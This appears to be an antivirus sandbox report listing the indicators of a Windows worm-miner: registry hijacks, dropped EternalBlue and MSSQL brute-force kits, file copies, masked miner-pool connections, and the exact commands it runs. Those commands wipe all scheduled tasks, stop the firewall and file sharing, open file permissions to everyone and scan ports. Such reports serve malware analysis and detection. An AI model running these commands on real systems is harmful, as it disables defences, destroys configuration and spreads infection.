Technical Information
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe] 'Debugger' = '<SYSTEM32>\svchost.exe'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe] 'Debugger' = '<SYSTEM32>\svchost.exe'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] 'Debugger' = '<SYSTEM32>\svchost.exe'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe] 'Debugger' = '<SYSTEM32>\svchost.exe'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe] 'Debugger' = '<SYSTEM32>\svchost.exe'
- [HKLM\SOFTWARE\CLASSES\.bat] '' = 'txtfile'
- [HKLM\SOFTWARE\CLASSES\.cmd] '' = 'txtfile'
- %APPDATA%\microsoft\windows\start menu\programs\startup\<File name>.exe
- <SYSTEM32>\tasks\miscfost
- <SYSTEM32>\tasks\flash
- <SYSTEM32>\tasks\netframework
- [HKLM\System\CurrentControlSet\Services\cefragsvc] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\cefragsvc] 'ImagePath' = '%WINDIR%\<File name>.exe'
- [HKLM\System\CurrentControlSet\Services\npf] 'ImagePath' = 'system32\drivers\npf.sys'
- [HKLM\System\CurrentControlSet\Services\Jklmno] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\Jklmno] 'ImagePath' = '<SYSTEM32>\oqumwuc.exe'
- 'cefragsvc' %WINDIR%\<File name>.exe
- 'npf' system32\drivers\npf.sys
- 'Jklmno' <SYSTEM32>\oqumwuc.exe
- <Drive name for removable media>:\fuckoff.exe
- <Drive name for removable media>:\flashplayer.dll
- '%WINDIR%\syswow64\net.exe' stop SharedAccess
- '%WINDIR%\syswow64\net.exe' stop MpsSvc
- '%WINDIR%\syswow64\net.exe' stop LanmanServer
- %WINDIR%\<File name>.exe
- nul
- %WINDIR%\ime\<File name>.exe
- <DRIVERS>\npf.sys
- %WINDIR%\dllhost\migrationdump\packet.dll
- %WINDIR%\dllhost\migrationdump\msvcr100d.dll
- %WINDIR%\dllhost\migrationdump\wpcap.dll
- %WINDIR%\dllhost\migrationdump\dialers.exe
- %WINDIR%\dllhost\migrationdump\msvcr100.dll
- %WINDIR%\dllhost\eternalblue\appcapture_x64.dll
- %WINDIR%\dllhost\eternalblue\appcapture_x32.dll
- %WINDIR%\dllhost\eternalblue\svchost.xml
- %WINDIR%\dllhost\eternalblue\spoolsrv.xml
- %WINDIR%\dllhost\eternalblue\specials\cnli-1.dll
- %WINDIR%\dllhost\eternalblue\specials\coli-0.dll
- %WINDIR%\dllhost\eternalblue\specials\crli-0.dll
- %WINDIR%\dllhost\eternalblue\specials\exma-1.dll
- %WINDIR%\dllhost\eternalblue\specials\libeay32.dll
- %WINDIR%\dllhost\eternalblue\specials\libxml2.dll
- %WINDIR%\dllhost\eternalblue\specials\posh-0.dll
- %WINDIR%\dllhost\eternalblue\specials\spoolsrv.exe
- %WINDIR%\dllhost\eternalblue\specials\ssleay32.dll
- %WINDIR%\dllhost\eternalblue\specials\svchost.exe
- %WINDIR%\dllhost\eternalblue\specials\tibe-2.dll
- %WINDIR%\dllhost\eternalblue\specials\trch-1.dll
- %WINDIR%\dllhost\eternalblue\specials\trfo-2.dll
- %WINDIR%\dllhost\eternalblue\specials\tucl-1.dll
- %WINDIR%\dllhost\eternalblue\specials\ucl.dll
- %WINDIR%\dllhost\eternalblue\specials\xdvl-0.dll
- %WINDIR%\dllhost\eternalblue\specials\zlib1.dll
- %WINDIR%\dllhost\eternalblue\specials\svchost.xml
- %WINDIR%\dllhost\eternalblue\specials\spoolsrv.xml
- %WINDIR%\svchost.xml
- %WINDIR%\spoolsrv.xml
- %WINDIR%\dllhost\eternalblue139\appcapture_x64.dll
- %WINDIR%\dllhost\eternalblue139\appcapture_x32.dll
- %WINDIR%\dllhost\eternalblue139\svchost.xml
- %WINDIR%\dllhost\eternalblue139\spoolsrv.xml
- %WINDIR%\dllhost\eternalblue139\specials\cnli-1.dll
- %WINDIR%\dllhost\eternalblue139\specials\coli-0.dll
- %WINDIR%\dllhost\eternalblue139\specials\crli-0.dll
- %WINDIR%\dllhost\eternalblue139\specials\exma-1.dll
- %WINDIR%\dllhost\eternalblue139\specials\libeay32.dll
- %WINDIR%\dllhost\eternalblue139\specials\libxml2.dll
- %WINDIR%\dllhost\eternalblue139\specials\posh-0.dll
- %WINDIR%\dllhost\eternalblue139\specials\spoolsrv.exe
- %WINDIR%\dllhost\eternalblue139\specials\ssleay32.dll
- %WINDIR%\dllhost\eternalblue139\specials\svchost.exe
- %WINDIR%\dllhost\eternalblue139\specials\tibe-2.dll
- %WINDIR%\dllhost\eternalblue139\specials\trch-1.dll
- %WINDIR%\dllhost\eternalblue139\specials\trfo-2.dll
- %WINDIR%\dllhost\eternalblue139\specials\tucl-1.dll
- %WINDIR%\dllhost\eternalblue139\specials\ucl.dll
- %WINDIR%\dllhost\eternalblue139\specials\xdvl-0.dll
- %WINDIR%\dllhost\eternalblue139\specials\zlib1.dll
- %WINDIR%\dllhost\eternalblue139\specials\svchost.xml
- %WINDIR%\dllhost\eternalblue139\specials\spoolsrv.xml
- %WINDIR%\dllhost\mssql\code.sql
- %WINDIR%\dllhost\mssql\http.sql
- %WINDIR%\dllhost\mssql\isql.exe
- %WINDIR%\dllhost\mssql\sqlack.exe
- %WINDIR%\dllhost\mssql\msvcr71.dll
- %WINDIR%\dllhost\mssql\ntwdblib.dll
- %WINDIR%\dllhost\mssql\user.txt
- %WINDIR%\dllhost\mssql\pass.txt
- %WINDIR%\temp\fzdk.king
- %WINDIR%\temp\networks\taskmgr.exe
- %WINDIR%\temp\vmnat.exe
- %WINDIR%\temp\networks\config.json
- %WINDIR%\syswow64\oqumwuc.exe
- %WINDIR%\flashplayer_e.lnk
- %WINDIR%\flashplayer_f.lnk
- %WINDIR%\flashplayer_g.lnk
- %WINDIR%\flashplayer_h.lnk
- %WINDIR%\flashplayer_i.lnk
- %WINDIR%\flashplayer_j.lnk
- %WINDIR%\flashplayer_k.lnk
- %WINDIR%\flashplayer_l.lnk
- %WINDIR%\flashplayer_m.lnk
- %WINDIR%\flashplayer_n.lnk
- %WINDIR%\flashplayer_o.lnk
- %WINDIR%\flashplayer_p.lnk
- %WINDIR%\flashplayer_q.lnk
- %WINDIR%\flashplayer_r.lnk
- %WINDIR%\flashplayer_s.lnk
- %WINDIR%\flashplayer_t.lnk
- %WINDIR%\flashplayer_u.lnk
- %WINDIR%\flashplayer_v.lnk
- %WINDIR%\flashplayer_w.lnk
- %WINDIR%\flashplayer_x.lnk
- %WINDIR%\flashplayer_y.lnk
- %WINDIR%\flashplayer_z.lnk
- %WINDIR%\flashplayercplapp.cpl
- %WINDIR%\flashplayer_d.lnk
- %WINDIR%\temp\1021010\....\temporaryfile
- %WINDIR%\svchost.xml
- %WINDIR%\spoolsrv.xml
- %WINDIR%\<File name>.exe
- %WINDIR%\syswow64\oqumwuc.exe
- %WINDIR%\flashplayer_e.lnk
- %WINDIR%\flashplayer_f.lnk
- %WINDIR%\flashplayer_g.lnk
- %WINDIR%\flashplayer_h.lnk
- %WINDIR%\flashplayer_i.lnk
- %WINDIR%\flashplayer_j.lnk
- %WINDIR%\flashplayer_k.lnk
- %WINDIR%\flashplayer_l.lnk
- %WINDIR%\flashplayer_m.lnk
- %WINDIR%\flashplayer_n.lnk
- %WINDIR%\flashplayer_o.lnk
- %WINDIR%\flashplayer_p.lnk
- %WINDIR%\flashplayer_q.lnk
- %WINDIR%\flashplayer_r.lnk
- %WINDIR%\flashplayer_s.lnk
- %WINDIR%\flashplayer_t.lnk
- %WINDIR%\flashplayer_u.lnk
- %WINDIR%\flashplayer_v.lnk
- %WINDIR%\flashplayer_w.lnk
- %WINDIR%\flashplayer_x.lnk
- %WINDIR%\flashplayer_y.lnk
- %WINDIR%\flashplayer_z.lnk
- %WINDIR%\flashplayercplapp.cpl
- %WINDIR%\flashplayer_d.lnk
- <Drive name for removable media>:\flashplayer.dll
- <SYSTEM32>\tasks\adobe acrobat update task
- <SYSTEM32>\tasks\opera scheduled autoupdate 1723415083
- <SYSTEM32>\tasks\microsoft\windows\active directory rights management services client\ad rms rights policy template management (automated)
- <SYSTEM32>\tasks\microsoft\windows\active directory rights management services client\ad rms rights policy template management (manual)
- <SYSTEM32>\tasks\microsoft\windows\appid\policyconverter
- <SYSTEM32>\tasks\microsoft\windows\appid\verifiedpublishercertstorecheck
- <SYSTEM32>\tasks\microsoft\windows\application experience\aitagent
- <SYSTEM32>\tasks\microsoft\windows\application experience\programdataupdater
- <SYSTEM32>\tasks\microsoft\windows\autochk\proxy
- <SYSTEM32>\tasks\microsoft\windows\bluetooth\uninstalldevicetask
- <SYSTEM32>\tasks\microsoft\windows\certificateservicesclient\systemtask
- <SYSTEM32>\tasks\microsoft\windows\certificateservicesclient\usertask
- <SYSTEM32>\tasks\microsoft\windows\certificateservicesclient\usertask-roam
- <SYSTEM32>\tasks\microsoft\windows\customer experience improvement program\consolidator
- <SYSTEM32>\tasks\microsoft\windows\customer experience improvement program\kernelceiptask
- <SYSTEM32>\tasks\microsoft\windows\customer experience improvement program\usbceip
- <SYSTEM32>\tasks\microsoft\windows\defrag\scheduleddefrag
- <SYSTEM32>\tasks\microsoft\windows\diagnosis\scheduled
- <SYSTEM32>\tasks\microsoft\windows\diskdiagnostic\microsoft-windows-diskdiagnosticdatacollector
- <SYSTEM32>\tasks\microsoft\windows\diskdiagnostic\microsoft-windows-diskdiagnosticresolver
- <SYSTEM32>\tasks\microsoft\windows\location\notifications
- <SYSTEM32>\tasks\microsoft\windows\maintenance\winsat
- <SYSTEM32>\tasks\microsoft\windows\media center\activatewindowssearch
- <SYSTEM32>\tasks\microsoft\windows\media center\configureinternettimeservice
- <SYSTEM32>\tasks\microsoft\windows\media center\dispatchrecoverytasks
- <SYSTEM32>\tasks\microsoft\windows\media center\ehdrminit
- <SYSTEM32>\tasks\microsoft\windows\media center\installplayready
- <SYSTEM32>\tasks\microsoft\windows\media center\mcupdate
- <SYSTEM32>\tasks\microsoft\windows\media center\mediacenterrecoverytask
- <SYSTEM32>\tasks\microsoft\windows\media center\objectstorerecoverytask
- <SYSTEM32>\tasks\microsoft\windows\media center\ocuractivate
- <SYSTEM32>\tasks\microsoft\windows\media center\ocurdiscovery
- <SYSTEM32>\tasks\microsoft\windows\media center\pbdadiscovery
- <SYSTEM32>\tasks\microsoft\windows\media center\pbdadiscoveryw1
- <SYSTEM32>\tasks\microsoft\windows\media center\pbdadiscoveryw2
- <SYSTEM32>\tasks\microsoft\windows\media center\periodicscanretry
- <SYSTEM32>\tasks\microsoft\windows\media center\pvrrecoverytask
- <SYSTEM32>\tasks\microsoft\windows\media center\pvrscheduletask
- <SYSTEM32>\tasks\microsoft\windows\media center\recordingrestart
- <SYSTEM32>\tasks\microsoft\windows\media center\registersearch
- <SYSTEM32>\tasks\microsoft\windows\media center\reindexsearchroot
- <SYSTEM32>\tasks\microsoft\windows\media center\sqlliterecoverytask
- <SYSTEM32>\tasks\microsoft\windows\media center\updaterecordpath
- <SYSTEM32>\tasks\microsoft\windows\memorydiagnostic\corruptiondetector
- <SYSTEM32>\tasks\microsoft\windows\memorydiagnostic\decompressionfailuredetector
- <SYSTEM32>\tasks\microsoft\windows\mobilepc\hotstart
- <SYSTEM32>\tasks\microsoft\windows\mui\lpremove
- <SYSTEM32>\tasks\microsoft\windows\multimedia\systemsoundsservice
- <SYSTEM32>\tasks\microsoft\windows\nettrace\gathernetworkinfo
- <SYSTEM32>\tasks\microsoft\windows\offline files\background synchronization
- <SYSTEM32>\tasks\microsoft\windows\offline files\logon synchronization
- <SYSTEM32>\tasks\microsoft\windows\perftrack\backgroundconfigsurveyor
- <SYSTEM32>\tasks\microsoft\windows\power efficiency diagnostics\analyzesystem
- <SYSTEM32>\tasks\microsoft\windows\rac\ractask
- <SYSTEM32>\tasks\microsoft\windows\ras\mobilitymanager
- <SYSTEM32>\tasks\microsoft\windows\registry\regidlebackup
- <SYSTEM32>\tasks\microsoft\windows\remoteassistance\remoteassistancetask
- <SYSTEM32>\tasks\microsoft\windows\shell\windowsparentalcontrols
- <SYSTEM32>\tasks\microsoft\windows\shell\windowsparentalcontrolsmigration
- <SYSTEM32>\tasks\microsoft\windows\sideshow\autowake
- <SYSTEM32>\tasks\microsoft\windows\sideshow\gadgetmanager
- <SYSTEM32>\tasks\microsoft\windows\sideshow\sessionagent
- <SYSTEM32>\tasks\microsoft\windows\sideshow\systemdataproviders
- <SYSTEM32>\tasks\microsoft\windows\softwareprotectionplatform\svcrestarttask
- <SYSTEM32>\tasks\microsoft\windows\systemrestore\sr
- <SYSTEM32>\tasks\microsoft\windows\task manager\interactive
- <SYSTEM32>\tasks\microsoft\windows\tcpip\ipaddressconflict1
- <SYSTEM32>\tasks\microsoft\windows\tcpip\ipaddressconflict2
- <SYSTEM32>\tasks\microsoft\windows\textservicesframework\msctfmonitor
- <SYSTEM32>\tasks\microsoft\windows\time synchronization\synchronizetime
- <SYSTEM32>\tasks\microsoft\windows\upnp\upnphostconfig
- <SYSTEM32>\tasks\microsoft\windows\user profile service\hiveuploadtask
- <SYSTEM32>\tasks\microsoft\windows\wdi\resolutionhost
- <SYSTEM32>\tasks\microsoft\windows\windows error reporting\queuereporting
- <SYSTEM32>\tasks\microsoft\windows\windows filtering platform\bfeonservicestarttypechange
- <SYSTEM32>\tasks\microsoft\windows\windows media sharing\updatelibrary
- <SYSTEM32>\tasks\microsoft\windows\windowsbackup\confignotification
- <SYSTEM32>\tasks\microsoft\windows\windowscolorsystem\calibration loader
- <SYSTEM32>\tasks\microsoft\windows defender\mpidletask
- <SYSTEM32>\tasks\mozilla\firefox default browser agent 308046b0af4a39cb
- <SYSTEM32>\tasks\officesoftwareprotectionplatform\svcrestarttask
- from %APPDATA%\microsoft\windows\start menu\programs\startup\<File name>.exe to %TEMP%\987969\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1020152\....\temporaryfile
- from <Drive name for removable media>:\fuckoff.exe to %WINDIR%\temp\1021010\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1021915\....\temporaryfile
- from %WINDIR%\temp\vmnat.exe to %WINDIR%\syswow64\1022633.bak
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1023709\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1025472\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1027188\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1028920\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1030620\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1032336\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1034037\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1035753\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1037484\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1039200\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1040916\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1042617\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1044348\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1046080\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1047889\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1049683\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1051415\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1053131\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1054847\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1056563\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1058295\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1060026\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1061742\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1063458\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1065174\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1066890\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1068606\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1070322\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1072023\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1073754\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1075564\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1077264\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1078980\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1080712\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1082475\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1084284\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1086078\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1087857\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1089635\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1091382\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1093130\....\temporaryfile
- from %WINDIR%\temp\networks\config.json to %WINDIR%\temp\1094877\....\temporaryfile
- %WINDIR%\temp\networks\config.json
- from <Full path to file> to %TEMP%\979467\....\temporaryfile
- 'li##.#ingminer.club':8887
- '20##.ip138.com':80
- 'ra#.##ngminer.club':5188
- http://li##.###gminer.club:8887/Cfg.ini via li##.#ingminer.club
- DNS ASK li##.#ingminer.club
- DNS ASK 20##.ip138.com
- DNS ASK ra#.##ngminer.club
- 'localhost':60902
- 'localhost':51270
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\<File name>.exe'
- '%WINDIR%\temp\networks\taskmgr.exe'
- '%WINDIR%\temp\vmnat.exe'
- '<Drive name for removable media>:\fuckoff.exe'
- '%WINDIR%\syswow64\oqumwuc.exe'
- '%WINDIR%\ime\<File name>.exe'
- '%WINDIR%\dllhost\migrationdump\dialers.exe' -iL %WINDIR%\dllhost\Struts045\Scan\IpDuan.txt -oJ %WINDIR%\dllhost\Struts045\Scan\Ips.txt --open --rate 4096 -p 88
- '%WINDIR%\syswow64\cmd.exe' /c ping 127.0.0.1 -n 6 >nul&&start %WINDIR%\<File name>.exe
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 6
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /delete /tn * /f
- '%WINDIR%\syswow64\schtasks.exe' /delete /tn * /f
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /sc minute /mo 1 /tn "Miscfost" /ru system /tr "cmd /c %WINDIR%\ime\<File name>.exe"
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\<File name>.exe /p everyone:F"
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /sc minute /mo 1 /tn "Flash" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\TEMP\Networks\taskmgr.exe /p everyone:F"
- '%WINDIR%\syswow64\cmd.exe' /c net stop SharedAccess
- '%WINDIR%\syswow64\cmd.exe' /c net stop MpsSvc
- '%WINDIR%\syswow64\schtasks.exe' /create /sc minute /mo 1 /tn "Miscfost" /ru system /tr "cmd /c %WINDIR%\ime\<File name>.exe"
- '%WINDIR%\syswow64\schtasks.exe' /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\<File name>.exe /p everyone:F"
- '%WINDIR%\syswow64\schtasks.exe' /create /sc minute /mo 1 /tn "Flash" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\TEMP\Networks\taskmgr.exe /p everyone:F"
- '%WINDIR%\syswow64\cmd.exe' /c net stop LanmanServer
- '%WINDIR%\syswow64\cmd.exe' /c sc config LanmanServer start= disabled
- '%WINDIR%\syswow64\sc.exe' config LanmanServer start= disabled
- '%WINDIR%\syswow64\net1.exe' stop MpsSvc
- '%WINDIR%\syswow64\net1.exe' stop SharedAccess
- '%WINDIR%\syswow64\net1.exe' stop LanmanServer
- '%WINDIR%\syswow64\cmd.exe' /c sc create npf binpath= system32\drivers\npf.sys type= kernel start= demand
- '%WINDIR%\syswow64\sc.exe' create npf binpath= system32\drivers\npf.sys type= kernel start= demand
- '<SYSTEM32>\cmd.exe' /c echo Y|cacls %WINDIR%\TEMP\Networks\taskmgr.exe /p everyone:F
- '<SYSTEM32>\cmd.exe' /c echo Y|cacls %WINDIR%\<File name>.exe /p everyone:F
- '<SYSTEM32>\cmd.exe' /c %WINDIR%\ime\<File name>.exe
- '<SYSTEM32>\cacls.exe' %WINDIR%\TEMP\Networks\taskmgr.exe /p everyone:F
- '<SYSTEM32>\cmd.exe' /S /D /c" echo Y"
- '<SYSTEM32>\cacls.exe' %WINDIR%\<File name>.exe /p everyone:F
- '%WINDIR%\syswow64\cmd.exe' /c ping 127.0.0.1 -n 6 >nul&&start %WINDIR%\<File name>.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /delete /tn * /f' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /sc minute /mo 1 /tn "Miscfost" /ru system /tr "cmd /c %WINDIR%\ime\<File name>.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\<File name>.exe /p everyone:F"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /sc minute /mo 1 /tn "Flash" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\TEMP\Networks\taskmgr.exe /p everyone:F"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c net stop SharedAccess' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c net stop MpsSvc' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c net stop LanmanServer' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c sc config LanmanServer start= disabled' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c sc create npf binpath= system32\drivers\npf.sys type= kernel start= demand' (with hidden window)
- '%WINDIR%\temp\networks\taskmgr.exe' ' (with hidden window)
- '<Drive name for removable media>:\fuckoff.exe' ' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo Y|cacls %WINDIR%\TEMP\Networks\taskmgr.exe /p everyone:F' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo Y|cacls %WINDIR%\<File name>.exe /p everyone:F' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c %WINDIR%\ime\<File name>.exe' (with hidden window)
- '%WINDIR%\dllhost\migrationdump\dialers.exe' -iL %WINDIR%\dllhost\Struts045\Scan\IpDuan.txt -oJ %WINDIR%\dllhost\Struts045\Scan\Ips.txt --open --rate 4096 -p 88' (with hidden window)